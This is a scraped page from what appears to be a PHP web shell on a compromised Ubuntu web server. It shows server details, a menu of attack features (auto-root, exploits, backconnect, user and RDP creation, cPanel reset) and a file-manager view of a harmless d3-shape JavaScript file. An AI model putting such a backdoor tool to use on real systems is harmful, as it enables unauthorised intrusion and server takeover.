Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cqt /
node_modules /
d3-shape /
src /
[ HOME SHELL ]
Name
Size
Permission
Action
curve
[ DIR ]
drwxr-xr-x
offset
[ DIR ]
drwxr-xr-x
order
[ DIR ]
drwxr-xr-x
symbol
[ DIR ]
drwxr-xr-x
arc.js
8.64
KB
-rw-r--r--
area.js
3.14
KB
-rw-r--r--
areaRadial.js
944
B
-rw-r--r--
array.js
242
B
-rw-r--r--
constant.js
81
B
-rw-r--r--
descending.js
86
B
-rw-r--r--
identity.js
43
B
-rw-r--r--
index.js
3.28
KB
-rw-r--r--
line.js
1.69
KB
-rw-r--r--
lineRadial.js
402
B
-rw-r--r--
link.js
1.79
KB
-rw-r--r--
math.js
492
B
-rw-r--r--
noop.js
29
B
-rw-r--r--
path.js
393
B
-rw-r--r--
pie.js
2.34
KB
-rw-r--r--
point.js
81
B
-rw-r--r--
pointRadial.js
101
B
-rw-r--r--
stack.js
1.39
KB
-rw-r--r--
symbol.js
1.8
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : symbol.js
import constant from "./constant.js"; import {withPath} from "./path.js"; import asterisk from "./symbol/asterisk.js"; import circle from "./symbol/circle.js"; import cross from "./symbol/cross.js"; import diamond from "./symbol/diamond.js"; import diamond2 from "./symbol/diamond2.js"; import plus from "./symbol/plus.js"; import square from "./symbol/square.js"; import square2 from "./symbol/square2.js"; import star from "./symbol/star.js"; import triangle from "./symbol/triangle.js"; import triangle2 from "./symbol/triangle2.js"; import wye from "./symbol/wye.js"; import times from "./symbol/times.js"; // These symbols are designed to be filled. export const symbolsFill = [ circle, cross, diamond, square, star, triangle, wye ]; // These symbols are designed to be stroked (with a width of 1.5px and round caps). export const symbolsStroke = [ circle, plus, times, triangle2, asterisk, square2, diamond2 ]; export default function Symbol(type, size) { let context = null, path = withPath(symbol); type = typeof type === "function" ? type : constant(type || circle); size = typeof size === "function" ? size : constant(size === undefined ? 64 : +size); function symbol() { let buffer; if (!context) context = buffer = path(); type.apply(this, arguments).draw(context, +size.apply(this, arguments)); if (buffer) return context = null, buffer + "" || null; } symbol.type = function(_) { return arguments.length ? (type = typeof _ === "function" ? _ : constant(_), symbol) : type; }; symbol.size = function(_) { return arguments.length ? (size = typeof _ === "function" ? _ : constant(+_), symbol) : size; }; symbol.context = function(_) { return arguments.length ? (context = _ == null ? null : _, symbol) : context; }; return symbol; }
Close